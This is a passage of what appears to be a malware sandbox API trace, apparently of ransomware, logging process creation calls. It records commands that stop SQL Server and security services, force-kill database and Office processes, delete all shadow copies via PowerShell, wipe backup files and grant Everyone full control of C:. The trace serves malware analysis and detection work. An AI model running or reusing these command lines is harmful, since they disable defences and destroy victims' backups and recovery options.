dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x448, hStdError=0x0), lpProcessInformation=0x2275ef8 | out: lpCommandLine="\"net.exe\" stop SQLBrowser /y", lpProcessInformation=0x2275ef8*(hProcess=0x50c, hThread=0x444, dwProcessId=0xb78, dwThreadId=0x73c)) returned 1 [0134.340] CloseHandle (hObject=0x448) returned 1 [0134.340] GetFileType (hFile=0x5a4) returned 0x3 [0134.340] CloseHandle (hObject=0x444) returned 1 [0138.232] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0138.233] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x504, hWritePipe=0x560f110*=0x518) returned 1 [0138.233] GetCurrentProcess () returned 0xffffffff [0138.233] GetCurrentProcess () returned 0xffffffff [0138.233] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x504, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x3f0) returned 1 [0138.233] CloseHandle (hObject=0x504) returned 1 [0138.233] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0138.233] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0138.233] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0138.233] CoTaskMemFree (pv=0x741d20) [0138.233] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop tmlisten /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f05c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x518, hStdError=0x0), lpProcessInformation=0x2274b54 | out: lpCommandLine="\"net.exe\" stop tmlisten /y", lpProcessInformation=0x2274b54*(hProcess=0x5a0, hThread=0x504, dwProcessId=0x6d8, dwThreadId=0x118c)) returned 1 [0138.357] CloseHandle (hObject=0x518) returned 1 [0138.357] GetFileType (hFile=0x3f0) returned 0x3 [0138.358] CloseHandle (hObject=0x504) returned 1 [0139.755] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0139.756] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x518, hWritePipe=0x560f110*=0x4f4) returned 1 [0139.756] GetCurrentProcess () returned 0xffffffff [0139.756] GetCurrentProcess () returned 0xffffffff [0139.756] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x518, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x478) returned 1 [0139.756] CloseHandle (hObject=0x518) returned 1 [0139.756] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0139.756] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0139.756] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0139.756] CoTaskMemFree (pv=0x741d20) [0139.756] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop SQLSafeOLRService /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f054*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x4f4, hStdError=0x0), lpProcessInformation=0x256a7e4 | out: lpCommandLine="\"net.exe\" stop SQLSafeOLRService /y", lpProcessInformation=0x256a7e4*(hProcess=0x4a0, hThread=0x518, dwProcessId=0x1364, dwThreadId=0xf00)) returned 1 [0139.770] CloseHandle (hObject=0x4f4) returned 1 [0139.770] GetFileType (hFile=0x478) returned 0x3 [0139.775] CloseHandle (hObject=0x518) returned 1 [0139.775] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0139.775] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x518, hWritePipe=0x560f110*=0x4e0) returned 1 [0139.775] GetCurrentProcess () returned 0xffffffff [0139.776] GetCurrentProcess () returned 0xffffffff [0139.776] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x518, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x52c) returned 1 [0139.776] CloseHandle (hObject=0x518) returned 1 [0139.776] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0139.776] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0139.776] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0139.776] CoTaskMemFree (pv=0x741d20) [0139.776] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop TrueKey /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f05c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x4e0, hStdError=0x0), lpProcessInformation=0x247df10 | out: lpCommandLine="\"net.exe\" stop TrueKey /y", lpProcessInformation=0x247df10*(hProcess=0x4f4, hThread=0x518, dwProcessId=0x126c, dwThreadId=0xae8)) returned 1 [0139.781] CloseHandle (hObject=0x4e0) returned 1 [0139.781] GetFileType (hFile=0x52c) returned 0x3 [0139.781] CloseHandle (hObject=0x518) returned 1 [0139.781] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0139.781] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x518, hWritePipe=0x560f110*=0x4e0) returned 1 [0139.781] GetCurrentProcess () returned 0xffffffff [0139.781] GetCurrentProcess () returned 0xffffffff [0139.781] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x518, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x4d0) returned 1 [0139.781] CloseHandle (hObject=0x518) returned 1 [0139.781] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0139.781] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0139.781] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0139.781] CoTaskMemFree (pv=0x741d20) [0139.782] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop SQLSERVERAGENT /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f05c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x4e0, hStdError=0x0), lpProcessInformation=0x24817c0 | out: lpCommandLine="\"net.exe\" stop SQLSERVERAGENT /y", lpProcessInformation=0x24817c0*(hProcess=0x444, hThread=0x518, dwProcessId=0xd88, dwThreadId=0xd60)) returned 1 [0139.786] CloseHandle (hObject=0x4e0) returned 1 [0139.786] GetFileType (hFile=0x4d0) returned 0x3 [0139.786] CloseHandle (hObject=0x518) returned 1 [0146.085] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0146.085] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x50c, hWritePipe=0x560f110*=0x4b0) returned 1 [0146.085] GetCurrentProcess () returned 0xffffffff [0146.085] GetCurrentProcess () returned 0xffffffff [0146.085] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x50c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x4f8) returned 1 [0146.085] CloseHandle (hObject=0x50c) returned 1 [0146.085] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0146.085] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0146.085] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0146.085] CoTaskMemFree (pv=0x741d20) [0146.086] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill.exe\" /IM mspub.exe /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f05c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x4b0, hStdError=0x0), lpProcessInformation=0x2497cec | out: lpCommandLine="\"taskkill.exe\" /IM mspub.exe /F", lpProcessInformation=0x2497cec*(hProcess=0x554, hThread=0x50c, dwProcessId=0x11cc, dwThreadId=0xe54)) returned 1 [0146.420] CloseHandle (hObject=0x4b0) returned 1 [0146.420] GetFileType (hFile=0x4f8) returned 0x3 [0146.420] CloseHandle (hObject=0x50c) returned 1 [0147.895] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0147.895] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x50c, hWritePipe=0x560f110*=0x4b0) returned 1 [0147.895] GetCurrentProcess () returned 0xffffffff [0147.895] GetCurrentProcess () returned 0xffffffff [0147.895] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x50c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x46c) returned 1 [0147.895] CloseHandle (hObject=0x50c) returned 1 [0147.896] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0147.896] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0147.896] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0147.896] CoTaskMemFree (pv=0x741d20) [0147.896] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill.exe\" /IM sqbcoreservice.exe /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f04c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x4b0, hStdError=0x0), lpProcessInformation=0x249ca44 | out: lpCommandLine="\"taskkill.exe\" /IM sqbcoreservice.exe /F", lpProcessInformation=0x249ca44*(hProcess=0x4a4, hThread=0x50c, dwProcessId=0xa58, dwThreadId=0x7d8)) returned 1 [0147.905] CloseHandle (hObject=0x4b0) returned 1 [0147.905] GetFileType (hFile=0x46c) returned 0x3 [0147.905] CloseHandle (hObject=0x50c) returned 1 [0149.530] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0149.530] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x4b0, hWritePipe=0x560f110*=0x504) returned 1 [0149.530] GetCurrentProcess () returned 0xffffffff [0149.530] GetCurrentProcess () returned 0xffffffff [0149.530] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x478) returned 1 [0149.530] CloseHandle (hObject=0x4b0) returned 1 [0149.530] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0149.530] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0149.530] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0149.531] CoTaskMemFree (pv=0x741d20) [0149.531] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill.exe\" /IM firefoxconfig.exe /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f04c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x504, hStdError=0x0), lpProcessInformation=0x2275c1c | out: lpCommandLine="\"taskkill.exe\" /IM firefoxconfig.exe /F", lpProcessInformation=0x2275c1c*(hProcess=0x588, hThread=0x4b0, dwProcessId=0x135c, dwThreadId=0x128c)) returned 1 [0149.539] CloseHandle (hObject=0x504) returned 1 [0149.540] GetFileType (hFile=0x478) returned 0x3 [0149.540] CloseHandle (hObject=0x4b0) returned 1 [0150.405] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0150.405] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x504, hWritePipe=0x560f110*=0x558) returned 1 [0150.406] GetCurrentProcess () returned 0xffffffff [0150.406] GetCurrentProcess () returned 0xffffffff [0150.406] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x504, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x200) returned 1 [0150.406] CloseHandle (hObject=0x504) returned 1 [0150.406] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0150.406] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0150.406] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0150.406] CoTaskMemFree (pv=0x741d20) [0150.406] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill.exe\" /IM dbsnmp.exe /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f05c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x558, hStdError=0x0), lpProcessInformation=0x25109d8 | out: lpCommandLine="\"taskkill.exe\" /IM dbsnmp.exe /F", lpProcessInformation=0x25109d8*(hProcess=0x534, hThread=0x504, dwProcessId=0xc60, dwThreadId=0x700)) returned 1 [0150.420] CloseHandle (hObject=0x558) returned 1 [0150.420] GetFileType (hFile=0x200) returned 0x3 [0150.421] CloseHandle (hObject=0x504) returned 1 [0151.094] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0151.094] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x504, hWritePipe=0x560f110*=0x558) returned 1 [0151.094] GetCurrentProcess () returned 0xffffffff [0151.095] GetCurrentProcess () returned 0xffffffff [0151.095] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x504, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x5b8) returned 1 [0151.095] CloseHandle (hObject=0x504) returned 1 [0151.095] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0151.095] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0151.095] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0151.095] CoTaskMemFree (pv=0x741d20) [0151.095] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill.exe\" /IM xfssvccon.exe /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f054*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x558, hStdError=0x0), lpProcessInformation=0x2545854 | out: lpCommandLine="\"taskkill.exe\" /IM xfssvccon.exe /F", lpProcessInformation=0x2545854*(hProcess=0x5b4, hThread=0x504, dwProcessId=0x112c, dwThreadId=0x1010)) returned 1 [0151.104] CloseHandle (hObject=0x558) returned 1 [0151.104] GetFileType (hFile=0x5b8) returned 0x3 [0151.104] CloseHandle (hObject=0x504) returned 1 [0153.660] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0153.660] CreatePipe (in: hReadPipe=0x560f59c, hWritePipe=0x560f598, lpPipeAttributes=0x560f51c, nSize=0x0 | out: hReadPipe=0x560f59c*=0x558, hWritePipe=0x560f598*=0x5e4) returned 1 [0153.661] GetCurrentProcess () returned 0xffffffff [0153.661] GetCurrentProcess () returned 0xffffffff [0153.661] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x558, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f5a0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f5a0*=0x5e0) returned 1 [0153.661] CloseHandle (hObject=0x558) returned 1 [0153.661] CreatePipe (in: hReadPipe=0x560f59c, hWritePipe=0x560f598, lpPipeAttributes=0x560f51c, nSize=0x0 | out: hReadPipe=0x560f59c*=0x558, hWritePipe=0x560f598*=0x5dc) returned 1 [0153.661] GetCurrentProcess () returned 0xffffffff [0153.662] GetCurrentProcess () returned 0xffffffff [0153.662] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x558, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f5a0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f5a0*=0x524) returned 1 [0153.662] CloseHandle (hObject=0x558) returned 1 [0153.662] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0153.662] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0153.662] CoTaskMemFree (pv=0x741d20) [0153.662] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"powershell.exe\" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f480*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x5e4, hStdError=0x5dc), lpProcessInformation=0x25679b8 | out: lpCommandLine="\"powershell.exe\" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }", lpProcessInformation=0x25679b8*(hProcess=0x554, hThread=0x558, dwProcessId=0xf24, dwThreadId=0xf9c)) returned 1 [0154.186] CloseHandle (hObject=0x5e4) returned 1 [0154.186] CloseHandle (hObject=0x5dc) returned 1 [0154.186] GetFileType (hFile=0x5e0) returned 0x3 [0154.186] GetFileType (hFile=0x524) returned 0x3 [0154.186] CloseHandle (hObject=0x558) returned 1 [0154.188] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0154.188] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x558, hWritePipe=0x560f110*=0x5dc) returned 1 [0154.189] GetCurrentProcess () returned 0xffffffff [0154.189] GetCurrentProcess () returned 0xffffffff [0154.189] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x558, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x5e4) returned 1 [0154.189] CloseHandle (hObject=0x558) returned 1 [0154.189] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0154.189] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0154.189] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0154.189] CoTaskMemFree (pv=0x741d20) [0154.189] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"del.exe\" /s /f /q c:\\*.VHD c:\\*.bac c:\\*.bak c:\\*.wbcat c:\\*.bkf c:\\Backup*.* c:\\backup*.* c:\\*.set c:\\*.win c:\\*.dsk", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560efb0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x5dc, hStdError=0x0), lpProcessInformation=0x256e764 | out: lpCommandLine="\"del.exe\" /s /f /q c:\\*.VHD c:\\*.bac c:\\*.bak c:\\*.wbcat c:\\*.bkf c:\\Backup*.* c:\\backup*.* c:\\*.set c:\\*.win c:\\*.dsk", lpProcessInformation=0x256e764*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0154.962] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x560eee4, nSize=0x101, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0155.985] CloseHandle (hObject=0x5dc) returned 1 [0156.003] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0156.003] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x558, hWritePipe=0x560f110*=0x5dc) returned 1 [0156.003] GetCurrentProcess () returned 0xffffffff [0156.003] GetCurrentProcess () returned 0xffffffff [0156.003] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x558, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x580) returned 1 [0156.003] CloseHandle (hObject=0x558) returned 1 [0156.003] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0156.003] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0156.003] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0156.003] CoTaskMemFree (pv=0x741d20) [0156.003] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"icacls\" \"C:*\" /grant Everyone:F /T /C /Q", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f048*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x5dc, hStdError=0x0), lpProcessInformation=0x2574864 | out: lpCommandLine="\"icacls\" \"C:*\" /grant Everyone:F /T /C /Q", lpProcessInformation=0x2574864*(hProcess=0x444, hThread=0x558, dwProcessId=0x808, dwThreadId=0x1108)) returned 1 [0157.471] CloseHandle (hObject=0x5dc) returned 1 [0157.479] GetFileType (hFile=0x580) returned 0x3 [0157.479] CloseHandle (hObject=0x558) returned 1 [0158.101] CoUninitialize () Thread: id = 82 os_tid = 0x9d4 [0080.468] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0080.497] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x581f248 | out: SystemInformation=0x32358f0, ResultLength=0x581f248*=0xe250) returned 0x0 [0080.540] GetCurrentProcessId () returned 0x71c [0080.540] 